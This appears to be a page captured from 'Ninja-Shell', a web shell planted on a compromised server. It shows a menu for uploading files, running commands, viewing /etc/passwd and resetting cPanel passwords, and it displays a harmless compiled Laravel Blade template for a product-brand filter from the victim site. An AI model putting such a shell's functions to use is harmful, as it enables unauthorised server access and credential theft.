{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www///arsu_theme/storage/framework/views/3fdb1c2d9e4c05826055b71f56d37770.php
<?php if($brands->isNotEmpty()): ?> <div class="bb-product-filter"> <h4 class="bb-product-filter-title"><?php echo e(__('Brands')); ?></h4> <div class="bb-product-filter-content"> <ul class="bb-product-filter-items filter-checkbox"> <?php $__currentLoopData = $brands; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $brand): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <li class="bb-product-filter-item"> <input id="attribute-brand-<?php echo e($brand->id); ?>" type="checkbox" name="brands[]" value="<?php echo e($brand->id); ?>" <?php if(in_array($brand->id, (array)request()->input('brands', []))): echo 'checked'; endif; ?> /> <label for="attribute-brand-<?php echo e($brand->id); ?>"><?php echo e($brand->name); ?></label> </li> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </ul> </div> </div> <?php endif; ?> <?php /**PATH /var/www/arsu/platform/plugins/ecommerce/resources/views/themes/includes/filters/brands.blade.php ENDPATH**/ ?>
./Ninja\.